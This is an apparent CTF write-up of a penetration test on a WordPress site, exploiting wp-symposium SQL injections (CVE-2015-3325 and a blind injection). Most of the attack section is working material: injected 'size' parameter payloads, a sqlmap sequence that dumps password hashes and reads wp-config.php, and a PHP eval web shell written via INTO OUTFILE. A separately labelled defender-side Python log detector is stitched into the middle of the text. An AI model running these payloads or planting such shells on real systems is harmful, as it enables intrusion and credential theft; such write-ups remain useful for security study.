WordPress Plugin Penetration Test

0x00 Information gathering

The target URL is a WordPress blog.

Apache/2.4.10 (Debian)

Since it is WP, run wpscan against it straight away.

[+] We found 2 plugins:
[+] Name: akismet
| Latest version: 3.3.4
| Location: http://218.2.197.234:2040/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
[+] Name: wp-symposium - v15.1
| Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
| Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1

Two outdated plugins were found, both carrying known vulnerabilities.

[!] Title: WP Symposium <= 15.1 - SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/7902
Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
Reference: http://packetstormsecurity.com/files/131801/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8140
Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8148
Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8

0x01 Exploitation

The SQL injection in CVE-2015-3325 is in get_album_item.php of the wp-symposium plugin.

<?php
include_once('../../../wp-config.php');
global $wpdb;
$iid = $_REQUEST['iid'];
$size = $_REQUEST['size'];
// $iid is bound through prepare() as %d, but $size is concatenated straight into
// the SELECT list, so whatever SQL is placed in it becomes part of the query.
$sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));
header("Content-type: image/jpeg");
echo stripslashes($image);
?>

The size parameter can be crafted to run a SQL query of our choosing, and the code does no filtering at all. However, when I queried column names with a table_name restriction nothing came back, and without the table_name restriction only 1 KB of content is shown because of the file-size limit, so the wp_users column names could not be seen.

?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
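As an added defender-side example (not code from the original post or from the plugin): a small Python check over web-server access logs that flags requests to get_album_item.php whose decoded size value is not a plain column name, which is exactly the condition under which the unprepared $size concatenation above turns into an attacker-chosen SELECT. The log lines, the allowlist of size values and the classification labels are all constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache combined-log lines (not from the original post). The
# second and third requests carry the two injected "size" values quoted above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2017:10:00:01 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=medium&iid=12 HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2017:10:00:07 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=group_concat(column_name)%20FROM%20information_schema.columns%20WHERE%20table_schema=database()%20and%20table_name=%27users%27%20;%20--&iid=1 HTTP/1.1" 200 1024 "-" "sqlmap/1.0"
10.0.0.9 - - [01/Jan/2017:10:00:09 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=group_concat(user_nicename,0x7e,user_pass)%20FROM%20wp_users%20;%20--&iid=1 HTTP/1.1" 200 87 "-" "sqlmap/1.0"
10.0.0.7 - - [01/Jan/2017:10:00:11 +0800] "GET /wp-content/plugins/wp-symposium/get_album_item.php?size=original&iid=3 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""
TARGET = "/wp-content/plugins/wp-symposium/get_album_item.php"
# Assumed allowlist of legitimate SELECT-list values; the real column set of
# wp_symposium_gallery_items is not given in the post.
ALLOWED_SIZE = {"thumb", "small", "medium", "large"}
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def query_params(url):
    """Split the query on '&' only (never ';') and decode each value once."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def classify_size(url):
    """None if clean; otherwise (decoded value, kind). 'sql-fragment' means the
    value cannot be a bare column name and so rewrites the SELECT statement."""
    if urlsplit(url).path != TARGET:
        return None
    for value in query_params(url).get("size", []):
        if value in ALLOWED_SIZE:
            continue
        kind = "unknown-column" if IDENT_RE.match(value) else "sql-fragment"
        return value, kind
    return None

def find_suspicious(log_text):
    """Return [(client_ip, decoded_size, kind)] for every offending log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        verdict = classify_size(m["url"])
        if verdict is not None:
            hits.append((m["ip"], *verdict))
    return hits
```

The same allowlist test, applied server-side before the string is concatenated into $sql, is the fix the plugin needed; the log check only tells you after the fact that the unfixed endpoint was being probed.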

No luck, so I gave up on this one and turned to the blind injection CVE.

https://www.exploit-db.com/exploits/37822/

The topic_id parameter is vulnerable to blind injection. Visit the corresponding page, save the POST request to a file, and test it with sqlmap. (I did not remove the sleep function from the exploit while testing, which made the script run far longer than it needed to...)

sqlmap -r "E:\1.txt" --dbs --level 3

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress

Table names

sqlmap -r "E:\1.txt" -D "wordpress" --tables

Database: wordpress
[36 tables]
+------------------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_symposium_audit |
| wp_symposium_cats |
| wp_symposium_chat2 |
| wp_symposium_chat2_typing |
| wp_symposium_chat2_users |
| wp_symposium_comments |
| wp_symposium_events |
| wp_symposium_events_bookings |
| wp_symposium_extended |
| wp_symposium_following |
| wp_symposium_friends |
| wp_symposium_gallery |
| wp_symposium_gallery_items |
| wp_symposium_group_members |
| wp_symposium_groups |
| wp_symposium_likes |
| wp_symposium_lounge |
| wp_symposium_mail |
| wp_symposium_news |
| wp_symposium_styles |
| wp_symposium_subs |
| wp_symposium_topics |
| wp_symposium_topics_images |
| wp_symposium_topics_scores |
| wp_symposium_usermeta |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+------------------------------+

Column names

sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" --columns

Database: wordpress
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| display_name | varchar(250) |
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_email | varchar(100) |
| user_login | varchar(60) |
| user_nicename | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
+---------------------+---------------------+

Dumping the contents

sqlmap -r "E:\1.txt" -D "wordpress" -T "wp_users" -C "user_pass" --dump

+------------------------------------+
| user_pass |
+------------------------------------+
| $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 |
+------------------------------------+

With CVE-2015-3325 and the corresponding table and column names, the administrator record can be retrieved as well.

?size=group_concat(user_nicename,0x7e,user_pass) FROM wp_users%20;%20--

But the administrator password stored in the database is a strong hash and could not be cracked.

An earlier scan had also found a phpMyAdmin page on the server, which could be a way in.

Use sqlmap to pull the password hashes for phpMyAdmin (the MySQL users).

sqlmap -r "E:\1.txt" --current-user --password

database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4
[*] root [1]:
password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2
[*] wordpress [1]:
password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B

These could not be cracked either...

On a tip from a senior, I used sqlmap to read the WP configuration file directly.

sqlmap -r "E:\1.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id"

That successfully retrieved the phpMyAdmin account credentials.

Getshell

Log in to phpMyAdmin and write a shell through a SQL query.

select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/nibuhuicaidao.php';

Error: Can't create/write to file '/var/www/html/nibuhuicaidao.php' (Errcode: 13)

The directory is not writable.

Brute-forcing directories with DirBuster turned up an images directory as well, and on testing it proved writable.

select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/images/nibuhuicaidao.php';

Connect with Chopper (caidao) and grab the flag: flag{Hi_Web_fLaG_Is_HEre}